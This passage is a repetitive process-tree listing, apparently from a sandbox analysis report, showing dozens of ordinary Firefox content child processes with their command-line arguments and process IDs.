C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=15220 -childID 55 -isForBrowser -prefsHandle 15228 -prefMapHandle 15232 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {66c04cd4-0fe8-4420-9c74-c7d1d1b2cf6b} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6200
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=15416 -childID 56 -isForBrowser -prefsHandle 15424 -prefMapHandle 15428 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {15c093ed-e341-45d6-88d5-a1369f3cffd6} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6212
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=15608 -childID 57 -isForBrowser -prefsHandle 15616 -prefMapHandle 15620 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {de4df243-3bec-4f39-8a68-67a2fabae679} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6224
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=15800 -childID 58 -isForBrowser -prefsHandle 15808 -prefMapHandle 15812 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7d925368-5f54-4f8b-9ac2-99f4032ae3f7} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6236
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=15992 -childID 59 -isForBrowser -prefsHandle 16000 -prefMapHandle 16004 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {daf13872-4a52-4dcf-8b89-ee33a904dcd0} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6248
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=16184 -childID 60 -isForBrowser -prefsHandle 16192 -prefMapHandle 16196 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b0506e56-bffe-4c7b-9a74-b13a4a0ba341} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6260
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=16376 -childID 61 -isForBrowser -prefsHandle 16388 -prefMapHandle 16392 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {517730ab-d695-40ee-a3ae-198a0b6a1597} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6272
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=16572 -childID 62 -isForBrowser -prefsHandle 16580 -prefMapHandle 16584 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3ee0b26b-4ed4-4852-a97f-6026c7adda9c} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6284
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=16776 -childID 63 -isForBrowser -prefsHandle 16856 -prefMapHandle 16852 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0b029240-c0fc-4456-b21b-651dd1cbcc82} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6296
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=16980 -childID 64 -isForBrowser -prefsHandle 17056 -prefMapHandle 17052 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {98e537f0-8631-47ee-8bd2-a59dda586784} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6308
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=17208 -childID 65 -isForBrowser -prefsHandle 16952 -prefMapHandle 16956 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7f84e53d-e914-4371-89c7-05121a2058e8} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6320
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=17340 -childID 66 -isForBrowser -prefsHandle 17348 -prefMapHandle 17352 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6362dcbf-d390-4671-90de-09a239ce04bf} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6332
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=17652 -childID 67 -isForBrowser -prefsHandle 17572 -prefMapHandle 17580 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {32546c41-108c-4dac-aacf-d3c28d0c0afe} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6348
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=17748 -childID 68 -isForBrowser -prefsHandle 17756 -prefMapHandle 17760 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a5ac4c8b-62cf-4ff8-9881-c2dc1e47051d} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6360
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=18028 -childID 69 -isForBrowser -prefsHandle 17948 -prefMapHandle 17952 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2fe009e8-e6f8-476a-ad59-1e37f96e39de} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6392
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=18232 -childID 70 -isForBrowser -prefsHandle 18152 -prefMapHandle 18160 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {da5b35af-8448-4d83-bad7-7ae838a2323c} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6404
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=18332 -childID 71 -isForBrowser -prefsHandle 18412 -prefMapHandle 18340 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f74b6091-bce3-4b74-bbea-3c68ab5649a8} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6416
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=18524 -childID 72 -isForBrowser -prefsHandle 18532 -prefMapHandle 18536 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8560accd-de12-4f71-ac65-85b039fb1d1c} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6428
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=18716 -childID 73 -isForBrowser -prefsHandle 18724 -prefMapHandle 18728 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {338bbdcf-9167-4d76-9bb3-4f44bc320473} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6440
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=19004 -childID 74 -isForBrowser -prefsHandle 18924 -prefMapHandle 18932 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bf27e87c-e94a-4c65-bbe3-8ee0c984ad6d} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6452
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=19156 -childID 75 -isForBrowser -prefsHandle 18896 -prefMapHandle 18904 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {066f1156-55cf-4bbb-9152-0250fae5ee7c} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6468
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=19264 -childID 76 -isForBrowser -prefsHandle 4588 -prefMapHandle 3524 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5644005f-38ae-4bc6-8bf7-642d488aa651} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6480
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=19428 -childID 77 -isForBrowser -prefsHandle 19436 -prefMapHandle 19440 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0d427017-9861-4853-bb14-77c42aaaa7dc} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6492
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=19624 -childID 78 -isForBrowser -prefsHandle 19632 -prefMapHandle 19636 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {545b9dfc-0c9b-4bdd-8d91-33e88e040926} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6504
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=19904 -childID 79 -isForBrowser -prefsHandle 19824 -prefMapHandle 19828 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {19561e41-eb4a-4042-abf6-dd88b86e986f} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6516
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=20020 -childID 80 -isForBrowser -prefsHandle 20100 -prefMapHandle 20096 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a0d0150b-4ddb-4289-afb2-d47ecf7e0271} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6528
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=20012 -childID 81 -isForBrowser -prefsHandle 20240 -prefMapHandle 20244 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {50d78b23-af45-4e4d-a88e-21b05748930e} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6540
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=20396 -childID 82 -isForBrowser -prefsHandle 20404 -prefMapHandle 20408 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8bdad8ea-e447-4349-b9a0-b3aec03624d4} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6552
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=20588 -childID 83 -isForBrowser -prefsHandle 20596 -prefMapHandle 20600 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ce91619a-e427-48a6-8b90-12fbe4334b1a} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6564
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=20780 -childID 84 -isForBrowser -prefsHandle 20788 -prefMapHandle 20792 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1808b832-bf3d-4311-8d11-0c6e3744c479} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6576
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=21004 -childID 85 -isForBrowser -prefsHandle 21016 -prefMapHandle 20960 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {21275c2f-0857-43cd-9348-3d465072c06f} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6588
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=21164 -childID 86 -isForBrowser -prefsHandle 21172 -prefMapHandle 21176 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0b384928-8edb-494b-b030-d507189e8749} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6600
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=21380 -childID 87 -isForBrowser -prefsHandle 21388 -prefMapHandle 21396 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d89dc552-d66d-4c1b-ab4a-d4b79d065f96} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6612
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=21576 -childID 88 -isForBrowser -prefsHandle 21540 -prefMapHandle 21536 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {75d29867-832c-422b-bb57-e20993807eac} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6624
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=21732 -childID 89 -isForBrowser -prefsHandle 21776 -prefMapHandle 21784 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {87efa8f3-9b29-401b-91d2-5e81cf80b46b} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6636
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=21968 -childID 90 -isForBrowser -prefsHandle 21980 -prefMapHandle 21924 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {80430b74-3704-421f-8119-44c1100519e3} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6648
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=22128 -childID 91 -isForBrowser -prefsHandle 22136 -prefMapHandle 22140 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b9510e30-0c2f-47eb-9df6-648e7800ea3c} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6660
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=22344 -childID 92 -isForBrowser -prefsHandle 22420 -prefMapHandle 22416 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e72db63c-e35e-4c57-8082-113289477b6a} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6672
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=22308 -childID 93 -isForBrowser -prefsHandle 21948 -prefMapHandle 22128 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {21c67825-e748-4e6d-887a-f5f0ae08e9dc} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6684
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=22716 -childID 94 -isForBrowser -prefsHandle 22724 -prefMapHandle 22728 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0642146c-2b48-4910-a215-aad9a70a225d} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6696
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=22900 -childID 95 -isForBrowser -prefsHandle 22908 -prefMapHandle 22912 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ed9fcba2-0fc4-4820-b096-57bb05da99e5} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6708
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=23116 -childID 96 -isForBrowser -prefsHandle 23192 -prefMapHandle 23188 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {54adf93c-49bf-45f4-b58b-51a4f3562832} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6720
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=23284 -childID 97 -isForBrowser -prefsHandle 23292 -prefMapHandle 23296 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {72ebbaf3-38b4-4797-8c72-b7a8cb5059f4} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6732
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=23476 -childID 98 -isForBrowser -prefsHandle 23484 -prefMapHandle 23488 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {78ae9367-47de-4771-9499-185a50a6538d} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6744
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=23672 -childID 99 -isForBrowser -prefsHandle 23680 -prefMapHandle 23684 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e59be207-4f88-4dc5-81a3-cc343b1b5b66} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6756
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=23888 -childID 100 -isForBrowser -prefsHandle 23964 -prefMapHandle 23960 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6b1f74c0-59f1-468a-b52b-7d472249df70} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6768
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=24116 -childID 101 -isForBrowser -prefsHandle 23860 -prefMapHandle 23864 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cf8af9a7-7618-40c0-bd7d-713482070bf6} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6780
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=24352 -childID 102 -isForBrowser -prefsHandle 24276 -prefMapHandle 24344 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3330eb45-48c8-4b5a-bb75-668de11d03fd} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6792
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=24528 -childID 103 -isForBrowser -prefsHandle 24232 -prefMapHandle 23672 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4b90d3dc-5e5a-49f5-8bf8-36c57b065da0} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6804
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=24636 -childID 104 -isForBrowser -prefsHandle 24644 -prefMapHandle 24648 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b6bef341-01e9-4eec-a658-ca6fe08135f7} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6816
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=24840 -childID 105 -isForBrowser -prefsHandle 24920 -prefMapHandle 24916 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e2fdf86f-4cfc-4ad2-afcd-d93ec72e7779} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6828
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=25032 -childID 106 -isForBrowser -prefsHandle 25112 -prefMapHandle 25108 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cd8ae231-6644-40e8-9c66-b562186f3925} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6844
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=25300 -childID 107 -isForBrowser -prefsHandle 24840 -prefMapHandle 25128 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5b49325a-5efa-416e-b5ad-017577124321} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6856
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=25428 -childID 108 -isForBrowser -prefsHandle 25504 -prefMapHandle 25500 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fab687ee-3e3d-4a2c-8336-b1e6bd0ede90} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6868
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=25596 -childID 109 -isForBrowser -prefsHandle 25608 -prefMapHandle 25612 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8395b1e1-84fa-4c3f-a618-f09308ec1eac} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6880
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=25792 -childID 110 -isForBrowser -prefsHandle 25800 -prefMapHandle 25804 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b6d75670-dd7a-4297-b81b-c18b12d0add9} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6892
-
-
